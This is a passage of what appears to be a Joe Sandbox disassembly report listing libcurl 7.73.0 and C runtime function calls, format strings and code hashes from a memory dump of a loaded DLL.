                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002751,?), ref: 6B6EEAC3
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002771,?), ref: 6B6EEAE8
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000027B9,?), ref: 6B6EEB0D
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000AC,00000001), ref: 6B6EEB32
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275C,?), ref: 6B6EEB57
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275D,?), ref: 6B6EEB7C
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000D8,00000008), ref: 6B6EEBAE
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E8C,?), ref: 6B6EEBD3
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000277D,?), ref: 6B6EEBF8
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000283A,?), ref: 6B6EEC1D
                                                                                                                            • curl_multi_add_handle.LIBCURL(?,00000000), ref: 6B6EEC4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_easy_setopt$___from_strstr_to_strchrcurl_maprintfcurl_multi_add_handle
                                                                                                                            • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                                                                                                            • API String ID: 667061265-3030351490
                                                                                                                            • Opcode ID: a22d997916c36ad3c20ce99d08b5a1a96d8e00a63b6c688175f4714f654dbcc7
                                                                                                                            • Instruction ID: a89c8b624700f70d188bbc86a5223f05b78fbdb8419fa4a9fe876ba460f7344b
                                                                                                                            • Opcode Fuzzy Hash: a22d997916c36ad3c20ce99d08b5a1a96d8e00a63b6c688175f4714f654dbcc7
                                                                                                                            • Instruction Fuzzy Hash: E6F13AF1E49311BBEF228A70CD42B8A77A6AF00750F0501A1ED547B391D7AE8E52C7E1
                                                                                                                            APIs
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%5I64d,?,?,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED02A
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED053
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dk,00000000,?,?,?,00000400,00000000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED065
                                                                                                                            • __allrem.LIBCMT ref: 6B6ED08A
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED098
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED0A8
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dM,00000000,?,?,?,00100000,00000000,00000000,?,00000000,?,00019999,00000000,?), ref: 6B6ED0BA
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED0E0
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dM,00000000,?,?,?,00100000,00000000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED0F2
                                                                                                                            • __allrem.LIBCMT ref: 6B6ED114
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED122
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED132
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dG,00000000,?,?,?,40000000,00000000,00000000,?,00000000,?,06666666,00000000,?), ref: 6B6ED144
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED169
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dG,00000000,?,?,?,40000000,00000000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED17B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED1A0
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dT,00000000,?,?,?,00000000,00000100,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED1B2
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED1C9
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dP,00000000,?,?,?,00000000,00040000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED1DB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
                                                                                                                            • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                            • API String ID: 3299120379-2102732564
                                                                                                                            • Opcode ID: 09856a2576b86e61cd0282bcf7489cc1b07a58a646f57b61b35e4f2128f1b02e
                                                                                                                            • Instruction ID: 3683cb1c6079ac8106604fef5f754f9c2917166458aa031fecde3dbc0d4b7674
                                                                                                                            • Opcode Fuzzy Hash: 09856a2576b86e61cd0282bcf7489cc1b07a58a646f57b61b35e4f2128f1b02e
                                                                                                                            • Instruction Fuzzy Hash: 6341D3E7BC666436E63068682C12FEF232DDBC1B59F150429FB08BB181965C691343FD
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C9245
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C92AB
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C92BD
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C92D1
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C9364
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C9376
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C938A
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C939F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.73.0%sQUIT$CLIENT libcurl 7.73.0DEFINE %s %sQUIT$CLIENT libcurl 7.73.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                                                                                                            • API String ID: 601868998-3098048912
                                                                                                                            • Opcode ID: 57b62015b3da2a9492dd9b129731ce53d0c4faadc05a2fbbb7698151238e12e4
                                                                                                                            • Instruction ID: 2deffe292048f0bccb23b42d92d3e7cbda79915d41f72bf752199a02c0f08670
                                                                                                                            • Opcode Fuzzy Hash: 57b62015b3da2a9492dd9b129731ce53d0c4faadc05a2fbbb7698151238e12e4
                                                                                                                            • Instruction Fuzzy Hash: B87139A2E0420467D7130A755D42B9B3BA8DF9275EF1441E4FC486A3C3FB2E9A1582A3
                                                                                                                            APIs
                                                                                                                            • curl_slist_free_all.LIBCURL(?,00000000,?,?,multipart/form-data), ref: 6B6E2B8F
                                                                                                                            • curl_strequal.LIBCURL(?,attachment,?,?,?,multipart/form-data), ref: 6B6E2CCC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_free_allcurl_strequal
                                                                                                                            • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                            • API String ID: 3213019040-1595554923
                                                                                                                            • Opcode ID: 74e373a76c39cf70e9f2cf1796d8c1a6cdf2a159afba9490d91f8afafd8889e7
                                                                                                                            • Instruction ID: f5de4fc86aa92ba6125ab3e89ad13a47d2a555bf25a7a816d55627d5f6b6569f
                                                                                                                            • Opcode Fuzzy Hash: 74e373a76c39cf70e9f2cf1796d8c1a6cdf2a159afba9490d91f8afafd8889e7
                                                                                                                            • Instruction Fuzzy Hash: 3091E3F1A0AB039BDB118E29CE8165777FBAF84758B00487DE9459B610E77CE9068B60
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6DAB26
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6DAB3C
                                                                                                                            • curl_strnequal.LIBCURL(Host:,00000000,00000005), ref: 6B6DAC1A
                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B6DAC3E
                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B6DAC62
                                                                                                                            • curl_strnequal.LIBCURL(Content-Length:,00000000,0000000F), ref: 6B6DAC86
                                                                                                                            • curl_strnequal.LIBCURL(Connection:,00000000,0000000B), ref: 6B6DACAA
                                                                                                                            • curl_strnequal.LIBCURL(Transfer-Encoding:,00000000,00000012), ref: 6B6DACCE
                                                                                                                            • curl_strnequal.LIBCURL(Authorization:,00000000,0000000E), ref: 6B6DACE2
                                                                                                                            • curl_strnequal.LIBCURL(Cookie:,00000000,00000007,?,?,?,?,?,?,6B6DE55E), ref: 6B6DACF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_strnequal$___from_strstr_to_strchr
                                                                                                                            • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:$^mk
                                                                                                                            • API String ID: 431725195-1466906702
                                                                                                                            • Opcode ID: e5cb89bf1b74a4e10ab1bc81075281ccdf689a179895e172b6a26c8465a489e5
                                                                                                                            • Instruction ID: fc7ba2dadbec0029ff69b9d7ee4f31f2c045188a68b489011da4448a887bb241
                                                                                                                            • Opcode Fuzzy Hash: e5cb89bf1b74a4e10ab1bc81075281ccdf689a179895e172b6a26c8465a489e5
                                                                                                                            • Instruction Fuzzy Hash: 91913AF1D0D2056FEB118F64DA04B963BB69F01358F0841F4EE589B242E77EDA52CB91
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED566
                                                                                                                            • curl_mfprintf.LIBCURL(89000005,** Resuming transfer from byte position %I64d,00051C86,BF830000,83C70000,00000620,000F4240,00000000,868D0000,6B6D1696,?), ref: 6B6ED59D
                                                                                                                            • curl_mfprintf.LIBCURL(89000005, %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed,83C70000,00000620,000F4240,00000000,868D0000,6B6D1696,?), ref: 6B6ED5B0
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED5FF
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED623
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED636
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED677
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED6D5
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED702
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED715
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED76F
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED891
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED8A1
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED8C7
                                                                                                                            • curl_mfprintf.LIBCURL(89000005,%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 6B6ED9A1
                                                                                                                            Strings
                                                                                                                            • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6B6ED996
                                                                                                                            • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6B6ED5A5
                                                                                                                            • ** Resuming transfer from byte position %I64d, xrefs: 6B6ED592
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_mfprintf
                                                                                                                            • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                                                                                                            • API String ID: 2030109004-664487449
                                                                                                                            • Opcode ID: db3f113b70da083b765a50fc806a447d35dc14095701659600f55c3ffc8dd59d
                                                                                                                            • Instruction ID: bb7f79e587f0cdd1d49d448b22a8ea265cd5d91b23e6efc951bb48ca551e3b89
                                                                                                                            • Opcode Fuzzy Hash: db3f113b70da083b765a50fc806a447d35dc14095701659600f55c3ffc8dd59d
                                                                                                                            • Instruction Fuzzy Hash: EAE14CB5945708AFEB209FB4CD40F9ABBFABF89308F004459E95DA7251DB356942CF20
                                                                                                                            APIs
                                                                                                                            • curl_maprintf.LIBCURL(Authorization: Bearer %s,?,?,?,?,?,?,?,?,?), ref: 6B6DCFF2
                                                                                                                            • curl_maprintf.LIBCURL(%s:%s,?,6B72B98E,?,00000000), ref: 6B6DD106
                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B6DD180
                                                                                                                              • Part of subcall function 6B6E48E0: curl_mvaprintf.LIBCURL(?,?,?,6B6C66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B6E48EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_maprintf$curl_mvaprintf
                                                                                                                            • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                            • API String ID: 3491783128-3980008082
                                                                                                                            • Opcode ID: 41f5005bcb8de46792e1601edc9b846f7e0bdc4975c1d72d185c4e1dc25c4f0c
                                                                                                                            • Instruction ID: 8342c095e40542ffc9cf4941255a3cb3eb1060aafce37592d989218fe20e574f
                                                                                                                            • Opcode Fuzzy Hash: 41f5005bcb8de46792e1601edc9b846f7e0bdc4975c1d72d185c4e1dc25c4f0c
                                                                                                                            • Instruction Fuzzy Hash: B181D5B1A84119AFDB00AF68DD41BEAB7B8EF45355F0480A6FC089B201D73ADD51CBE5
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CDEE5
                                                                                                                            • curl_maprintf.LIBCURL(%u.%u.%u.%u,00000000,00000000,00000000,00000000), ref: 6B6CE134
                                                                                                                              • Part of subcall function 6B6E48E0: curl_mvaprintf.LIBCURL(?,?,?,6B6C66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B6E48EA
                                                                                                                              • Part of subcall function 6B6D84A0: inet_pton.WS2_32(00000002,00000000,?), ref: 6B6D8590
                                                                                                                              • Part of subcall function 6B6D84A0: inet_pton.WS2_32(00000017,00000000,?), ref: 6B6D85C0
                                                                                                                              • Part of subcall function 6B6C2A60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6C2BA0
                                                                                                                            Strings
                                                                                                                            • Bad PASV/EPSV response: %03d, xrefs: 6B6CE3A3
                                                                                                                            • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 6B6CE10E
                                                                                                                            • %c%c%c%u%c, xrefs: 6B6CDF1B
                                                                                                                            • Illegal port number in EPSV reply, xrefs: 6B6CDF60
                                                                                                                            • %u,%u,%u,%u,%u,%u, xrefs: 6B6CE06A
                                                                                                                            • Can't resolve proxy host %s:%hu, xrefs: 6B6CE1DD
                                                                                                                            • Couldn't interpret the 227-response, xrefs: 6B6CE083
                                                                                                                            • Weirdly formatted EPSV reply, xrefs: 6B6CDFCA
                                                                                                                            • %u.%u.%u.%u, xrefs: 6B6CE12F
                                                                                                                            • Connecting to %s (%s) port %d, xrefs: 6B6CE304
                                                                                                                            • Can't resolve new host %s:%hu, xrefs: 6B6CE257
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: inet_pton$Unothrow_t@std@@@___from_strstr_to_strchr__ehfuncinfo$??2@curl_maprintfcurl_mvaprintf
                                                                                                                            • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                                                                                                            • API String ID: 1323756762-2414412286
                                                                                                                            • Opcode ID: 8edb4c218f032cfd76fb9cc2ca34a54b9462158e2c197e5db2f3a8ac02b2ccc6
                                                                                                                            • Instruction ID: 9b476dc9360a4297d85fbd4345057c6bfa2be9f0615985fb6080ad1090db44f5
                                                                                                                            • Opcode Fuzzy Hash: 8edb4c218f032cfd76fb9cc2ca34a54b9462158e2c197e5db2f3a8ac02b2ccc6
                                                                                                                            • Instruction Fuzzy Hash: 31D1E8F1E00119ABDB249F64CD42BEBB7B8FF05315F0001E6E91D96141D73DAAA48BE6
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(Negotiate,?,00000009,00000000,?,?,?,00000000), ref: 6B6DB61C
                                                                                                                            • curl_strnequal.LIBCURL(NTLM,?,00000004,00000000,?,?,?,00000000), ref: 6B6DB6A0
                                                                                                                            • curl_strnequal.LIBCURL(Digest,?,00000006,?,?,?,00000000,?,?,?,00000000), ref: 6B6DB704
                                                                                                                            • curl_strnequal.LIBCURL(Basic,?,00000005,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 6B6DB75D
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_strnequal$curl_msnprintfcurl_mvsnprintf
                                                                                                                            • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate$t!
                                                                                                                            • API String ID: 4236074386-280430007
                                                                                                                            • Opcode ID: c8096b9e5d99eeb61ee63aca6b54e8228c6aa30130b25ab1eccf778e090fa84c
                                                                                                                            • Instruction ID: 33ce46a4e2062f0b9dabf5a3fb96dfe9c8cd31cc583fb3e54eb72bf5b2d75bab
                                                                                                                            • Opcode Fuzzy Hash: c8096b9e5d99eeb61ee63aca6b54e8228c6aa30130b25ab1eccf778e090fa84c
                                                                                                                            • Instruction Fuzzy Hash: 28615CF4A04205ABEB008E75DD42B867FE5EF02348F1C80B5ECA98B146E73ED555CBA5
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 6B7251CC
                                                                                                                              • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
                                                                                                                              • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725D6C
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725D7E
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725D90
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DA2
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DB4
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DC6
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DD8
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DEA
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DFC
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E0E
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E20
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E32
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E44
                                                                                                                            • _free.LIBCMT ref: 6B7251EE
                                                                                                                            • _free.LIBCMT ref: 6B725203
                                                                                                                            • _free.LIBCMT ref: 6B72520E
                                                                                                                            • _free.LIBCMT ref: 6B725230
                                                                                                                            • _free.LIBCMT ref: 6B725243
                                                                                                                            • _free.LIBCMT ref: 6B725251
                                                                                                                            • _free.LIBCMT ref: 6B72525C
                                                                                                                            • _free.LIBCMT ref: 6B725294
                                                                                                                            • _free.LIBCMT ref: 6B72529B
                                                                                                                            • _free.LIBCMT ref: 6B7252B8
                                                                                                                            • _free.LIBCMT ref: 6B7252D0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
